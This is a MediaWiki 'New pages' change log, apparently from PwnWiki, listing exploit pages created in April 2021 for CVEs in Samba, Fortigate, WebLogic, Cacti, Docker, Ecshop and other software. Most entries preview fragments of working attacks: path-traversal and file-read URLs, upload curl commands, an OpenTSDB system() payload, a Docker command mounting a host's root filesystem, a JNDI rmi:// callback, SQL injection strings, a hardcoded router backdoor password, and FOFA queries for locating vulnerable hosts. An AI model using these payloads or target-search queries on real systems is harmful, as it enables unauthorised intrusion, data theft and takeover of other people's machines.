New pages

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

14:53, 30 April 2021 ‎CVE-2017-7494 Samba遠程代碼執行漏洞 (hist | edit) ‎[277 bytes] ‎Atsud0 (talk | contribs) (Created page with " === EXP === [https://github.com/joxeankoret/CVE-2017-7494 CVE-2017-7494] === Info === [https://www.anquanke.com/post/id/86181 Samba远程代码执行漏洞(CVE-2017-7494)-...")
14:46, 30 April 2021 ‎Mw-mainpage-url (hist | edit) ‎[89 bytes] ‎Pwnwiki (talk | contribs) (Created page with "{{Template:Home}}") Tag: Visual edit: Switched
14:38, 30 April 2021 ‎CVE-2020-7384 msfvenom APK模板命令注入 (hist | edit) ‎[1,961 bytes] ‎Atsud0 (talk | contribs) (Created page with " ## Info [CVE-2020-7384](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7384) ## EXP <pre> # Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template c...")
08:56, 30 April 2021 ‎NodeBB Plugin Emoji 3.2.1 任意文件寫入漏洞 (hist | edit) ‎[2,292 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write # Date: 2021-02-01 # Exploit Author: 1F98D # Software Link: https://nodebb.org/ # Version: Emoj...")
08:56, 30 April 2021 ‎FOGProject 1.5.9 文件上傳&RCE漏洞 (hist | edit) ‎[1,185 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated) # Date: 2021-04-28 # Exploit Author: [email protected] # Vendor Homepage: https://fogproject....")
08:54, 30 April 2021 ‎CVE-2020-14295 Cacti 1.2.12 - 'filter' SQL注入&遠程代碼執行漏洞 (hist | edit) ‎[3,330 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution # Date: 04/28/2021 # Exploit Author: Leonardo Paiva # Vendor Homepage: https://www...")
13:21, 29 April 2021 ‎CVE-2021-28149 CVE-2021-28150 CVE-2021-28151 宏電 H8922 多個漏洞 (hist | edit) ‎[9,720 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==ZoomEye== <pre> app:"Hongdian H8922 Industrial Router </pre> ==宏電 H8922 Telnet後門漏洞== 使用Telnet連接目標5188端口，賬號密碼為<code>root/superzxmn</c...")
11:39, 29 April 2021 ‎Apache Solr任意文件讀取漏洞/en (hist | edit) ‎[5,395 bytes] ‎LovelyWei (talk | contribs) (Created page with "==File Reading==")
11:33, 29 April 2021 ‎安卓版TikTok RCE漏洞/en (hist | edit) ‎[3,968 bytes] ‎LovelyWei (talk | contribs) (Created page with "Malicious library code:")
11:31, 29 April 2021 ‎Windows7/win2008特權提升0day/en (hist | edit) ‎[9,249 bytes] ‎LovelyWei (talk | contribs) (Created page with "Save the exploit as <code>taskxpl.wsf</code>")
11:02, 29 April 2021 ‎CVE-2021-3449 OpenSSL拒絕服務漏洞/en (hist | edit) ‎[335 bytes] ‎LovelyWei (talk | contribs) (Created page with "openssl versions below 1.1.1-k, maliciously constructed requests using openssl software (including nginx and trojan-gfw, etc.) in the default configuration can crash the server.")
20:04, 28 April 2021 ‎CVE-2021-29460 Kirby CMS 3.5.3.1 XSS漏洞 (hist | edit) ‎[1,260 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS) # Date: 21-04-2021 # Exploit Author: Sreenath Raghunathan # Vendor Homepage: https://getki...")
11:15, 28 April 2021 ‎CVE-2021-24285 WordPress SQL注入漏洞 (hist | edit) ‎[1,985 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==簡介== 插件名稱：wp-plugin：cars-seller-auto-classifieds-script 受影響的版本：2.1.0（如果有，則可能是較低版本）漏洞：注入所需的最...")
11:03, 28 April 2021 ‎Cute editor本地文件包含漏洞 (hist | edit) ‎[152 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==影響版本== CuteEditor For Net 6.4 ==POC== <pre> http://navisec.it/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config </pre>")
11:01, 28 April 2021 ‎Kindeditor 上傳漏洞 (hist | edit) ‎[390 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== kindeditor <= 4.1.11 ==POC== <pre> curl -F"[email protected]" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file curl -F"[email protected]" http://127.0.0....")
19:45, 27 April 2021 ‎Montiorr 1.7.6m 文件上傳&XSS漏洞 (hist | edit) ‎[1,062 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Montiorr 1.7.6m - File Upload to XSS # Date: 25/4/2021 # Exploit Author: Ahmad Shakla # Software Link: https://github.com/Monitorr/Monitorr # Te...")
19:44, 27 April 2021 ‎WordPress Plugin WPGraphQL 1.3.5 拒絕服務漏洞 (hist | edit) ‎[1,579 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service # Author: Dolev Farhi # Date: 2021-04-12 # Vendor Homepage: https://www.wpgraphql.com/ # V...")
19:42, 27 April 2021 ‎Kimai 1.14 - CSV注入漏洞 (hist | edit) ‎[861 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Kimai 1.14 - CSV Injection # Date: 26/04/2021 # Exploit Author: Mohammed Aloraimi # Vendor Homepage: https://www.kimai.org/ # Software Link: htt...")
15:04, 27 April 2021 ‎CVE-2020-35476 OpenTSDB 2.4.0 遠程代碼執行漏洞 (hist | edit) ‎[368 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="Opentsdb" ||body="opentsdb_header.jpg" </pre> ==Bypass Payload== <pre> [33:system('touch/tmp/poc.txt')] </pre> ==POC== <pre> http://opentsdbhost.local/...")
15:01, 27 April 2021 ‎CVE-2020-29564 Consul Docker images 空密碼登錄漏洞 (hist | edit) ‎[204 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> port="2375" && protocol=="docker" </pre> ==POC== <pre> docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine File Access: cat /mnt/etc/s...")
15:00, 27 April 2021 ‎CVE-2020-27131 Cisco Security Manager 反序列化RCE漏洞 (hist | edit) ‎[1,070 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> import java.security.InvalidKeyException; import java.util.Base64; import com.cisco.nm.cmf.security.jaas.BlobCrypt; public class JaasEncryptor { public...")
14:58, 27 April 2021 ‎CVE-2021-26700 NPM VSCode 插件遠程代碼執行漏洞 (hist | edit) ‎[66 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> https://github.com/jackadamson/CVE-2021-26700 </pre>")
14:53, 27 April 2021 ‎Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML 代碼注入漏洞 (hist | edit) ‎[2,941 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> <-- Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 JS/HTML Code Injection Vendor: Leica Geosystems AG Product web page: https://www.leica-geosystems.com A...")
17:53, 26 April 2021 ‎Hasura GraphQL 1.3.3 遠程命令執行漏洞 (hist | edit) ‎[1,242 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Hasura GraphQL 1.3.3 - Remote Code Execution # Software: Hasura GraphQL # Software Link: https://github.com/hasura/graphql-engine # Version: 1.3...")
17:52, 26 April 2021 ‎OpenPLC 3 遠程命令執行漏洞 (hist | edit) ‎[8,630 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: OpenPLC 3 - Remote Code Execution (Authenticated) # Date: 25/04/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://www.openplcpr...")
17:52, 26 April 2021 ‎CVE-2021-28419 SEO Panel 4.8.0 - 'order col' SQL盲注漏洞 (hist | edit) ‎[1,676 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2) # Author: nu11secur1ty # Testing and Debugging: nu11secur1ty # Date: 04/25/2021 # Vendor:...")
17:49, 26 April 2021 ‎新點OA 敏感信息洩露漏洞 (hist | edit) ‎[166 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="新点OA" </pre> ==Payload== <pre> /ExcelExport/人员列表.xls </pre> 將會下載人員列表，使用默認密碼11111即可登錄後臺。")
16:27, 25 April 2021 ‎CVE-2021-31762 Webmin CSRF漏洞 (hist | edit) ‎[186 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==簡介== 利用CSRF攻擊，通過Webmin的添加用戶功能創建特權用戶，然後通過特權用戶權限反彈shell。 ==EXP== https://github.com/electronicbots/CVE...")
16:26, 25 April 2021 ‎CVE-2021-31761 Webmin XSS&遠程命令執行漏洞 (hist | edit) ‎[56 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== https://github.com/electronicbots/CVE-2021-31761")
16:24, 25 April 2021 ‎CVE-2021-31760 Webmin CSRF&遠程命令執行漏洞 (hist | edit) ‎[4,160 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==截圖== 500px ==EXP== <pre> import time, subprocess,random print('''\033[1;37m __ __ _ ____ _ _________ _ _...")
12:05, 25 April 2021 ‎用友 U8 OA test.jsp SQL注入漏洞 (hist | edit) ‎[1,968 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==Payload== <pre> /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1)) </pre> ==POC== <pre> import requests import sys import random import re from req…」的新頁面)
19:12, 24 April 2021 ‎ShowDoc 遠程代碼執行漏洞 (hist | edit) ‎[767 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==FOFA== <pre> app="ShowDoc" </pre> ==POC== <pre> POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0;…」的新頁面)
15:45, 24 April 2021 ‎用友 NCCloud FS文件管理SQL注入漏洞 (hist | edit) ‎[910 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==FOFA== <pre> FOFA "NCCloud" </pre> ==漏洞利用== 在應用中存在文件服務器管理登錄頁面: <pre> http://xxx.xxx.xxx.xxx/fs/ </pre> 請求包: <…」的新頁面)
09:36, 24 April 2021 ‎GetSimple CMS My SMTP Contact Plugin 1.1.2 CSRF&存儲型XSS&RCE漏洞 (hist | edit) ‎[9,244 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==EXP== <pre> # Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.2 - CSRF to Stored XSS to RCE # Exploit Author: Bobby Cooke (boku) # Date: 22/04/2021 # Ve…」的新頁面)
09:35, 24 April 2021 ‎CVE-2021-3318 DzzOffice 2.02.1 XSS漏洞 (hist | edit) ‎[3,835 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==XSS== <pre> # Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS) # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty, g3ck0dr1v3…」的新頁面)
09:34, 24 April 2021 ‎Sipwise C5 NGCP CSC XSS漏洞 (hist | edit) ‎[4,066 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==XSS== <pre> # Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS) # Date: 13.04.2021 # Exploit Author: LiquidWorm # Vend…」的新頁面)
09:33, 24 April 2021 ‎Sipwise C5 NGCP CSC CSRF漏洞 (hist | edit) ‎[1,905 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==CSRF== <pre> # Exploit Title: Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF) # Date: 13.04.2021 # Exploit Author: LiquidWorm # Vendor Homepa…」的新頁面)
09:33, 24 April 2021 ‎Moodle 3.10.3 XSS漏洞 (hist | edit) ‎[961 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==XSS== <pre> # Exploit Title: Moodle 3.10.3 - 'url' Persistent Cross Site Scripting # Date: 22/04/2021 # Exploit Author: UVision # Vendor Homepage: https://moodl…」的新頁面)
17:36, 23 April 2021 ‎金山 V8 終端安全系統任意文件讀取漏洞 (hist | edit) ‎[166 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==FOFA== <pre> title="在线安装-V8+终端安全系统Web控制台" </pre> ==POC== <pre> http://xxx.xxx.xxx.xxx/htmltopdf/downfile.php?filename=downfile.php </…」的新頁面)
09:02, 23 April 2021 ‎CVE-2018-13382 Fortigate SSL VPN 後門 (hist | edit) ‎[4,445 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==後門影響== Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.9 Fortinet Fortios 5.4.11 ==POC== <pre> import requests, binascii, optparse, sy…」的新頁面)
09:02, 23 April 2021 ‎CVE-2018-13380 Fortigate SSL VPN XSS漏洞 (hist | edit) ‎[313 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==漏洞影響== Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.8 ==XSS== <pre> /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%…」的新頁面)
09:00, 23 April 2021 ‎CVE-2018-13379 Fortigate SSL VPN 任意文件讀取漏洞 (hist | edit) ‎[232 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==漏洞影響== Fortinet FortiOS 5.6.3版本至5.6.7版本、Fortinet FortiOS 6.0.0版本至6.0.4版本中的SSL VPN 受此漏洞影響。 ==POC== <pre> /remote…」的新頁面)
08:56, 23 April 2021 ‎CVE-2020-11651 SaltStack 認證繞過漏洞 (hist | edit) ‎[10,296 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==EXP== <pre> #!/usr/bin/env python # # Exploit for CVE-2020-11651 and CVE-2020-11652 # Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020…」的新頁面)
08:54, 23 April 2021 ‎CVE-2019-2890 Oracle WebLogic 反序列化漏洞 (hist | edit) ‎[8,493 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==POC== <pre> #!/usr/bin/python # -*- coding: utf-8 -*- # 2019-10-17 8:45 import socket import time import re import sys timeout = int(sys.argv[1]) VUL=['CVE-20…」的新頁面)
08:52, 23 April 2021 ‎CVE-2020-14841 weblogic jndi 注入漏洞 (hist | edit) ‎[1,089 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==POC== <pre> // JdbcRowSetImpl JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); jdbcRowSet.setDataSourceName("rmi://192.168.3.254:8888/x…」的新頁面)
08:50, 23 April 2021 ‎CVE-2020-5398 Spring MVC 反射文件下載漏洞 (hist | edit) ‎[526 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==漏洞影響== Spring Framework 5.2.0 to 5.2.2，5.1.0 to 5.1.12，5.0.0 to 5.0.15 ==POC== <pre> GET /?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Awh…」的新頁面)
08:47, 23 April 2021 ‎Ecshop2.x 命令執行漏洞 (hist | edit) ‎[602 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==命令執行== <pre> Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286…」的新頁面)
08:46, 23 April 2021 ‎Ecshop2.x SQL注入漏洞 (hist | edit) ‎[179 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「==Payload== <pre> Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:…」的新頁面)
17:46, 22 April 2021 ‎首頁 (hist | edit) ‎[17 bytes] ‎Pwnwiki (talk | contribs) (建立內容為「{{Template:Home}}」的新頁面)
17:27, 22 April 2021 ‎CVE-2021-30030 CVE-2021-30034 CVE-2021-30039 CVE-2021-30042 RemoteClinic 2.0 存儲型XSS漏洞 (hist | edit) ‎[2,001 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 13/04/2021 # Exploit Author: Saud Ahmad # Vendor Homepage: https://remot...")

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

Anonymous

Search

New pages

Namespaces

More

Page actions

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

New pages

Navigation

Wiki tools

Page tools